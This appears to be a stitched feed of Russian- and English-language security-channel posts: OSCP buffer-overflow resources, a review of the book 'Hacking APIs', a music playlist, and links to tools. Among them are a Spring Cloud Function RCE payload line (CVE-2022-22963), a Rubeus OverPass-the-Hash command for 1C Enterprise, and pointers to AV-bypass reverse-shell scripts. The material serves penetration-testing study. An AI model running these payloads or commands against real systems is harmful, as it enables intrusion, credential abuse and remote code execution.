#Bufferoverflow #BOF #OSCP

Buffer Overflow EIP Offset String Generator

This tool is used to find/calculate the offset in an exploit string where your address to overwrite EIP should be. This is the same as the Metasploit, pvefindaddr, and Mona scripts: pattern_create and pattern_offset.

https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/

Всё что нужно знать о Buffer overflow для OSCP в одной заметке:

https://liodeus.github.io/2020/08/11/bufferOverflow.html

Лабы для тренировки:

https://tryhackme.com/room/bufferoverflowprep

#OSCP #BOF #Bufferoverflow

📖 Hacking APIs: Breaking Web Application Programming Interfaces.

• Дата выхода: 5 Марта 2022 год.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Цена в онлайн магазине: 36$ или 4464₽.

• VT.

In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:
• Enumerating APIs users and endpoints using fuzzing techniques;
• Using Postman to discover an excessive data exposure vulnerability;
• Performing a JSON Web Token attack against an API authentication process;
• Combining multiple API attack techniques to perform a NoSQL injection;
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability.

🧩 Софт для чтения.

#Hack #Web #Eng

Хочу поделиться плейлистом который в последнее время у меня на репите.
Massive Attack + Portishead + Morcheeba = кайф!

https://www.youtube.com/watch?v=_gozzJ5Yjsc

OWASP. Руководство по тестированию веб-безопасности, автор Эйон Кири, 2020, перевод на русский осуществлен Condor (Александр)

Большое количество книг на разные темы от выживания до секретов резьбы по дереву

PSSW100AVB

This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)

https://github.com/tihanyin/PSSW100AVB

#av #evasion #amsi #powershell #ps1

SpringShell: Spring Core RCE
(CVE-2022-22963)

PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

Exploit:
https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve

OverPass-the-Hash in 1C Enterprise

To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.

Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"

Bonus:
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell

#1c #pth #rubeus #ad

CrowdSec - незаметное перенапревление зловредного траффика подальше в лес, к заранее приготовленным медовым ульям👺 🐝🐝🐝

#soc #blueteam #defensive

https://youtu.be/2OEDFCo1VXY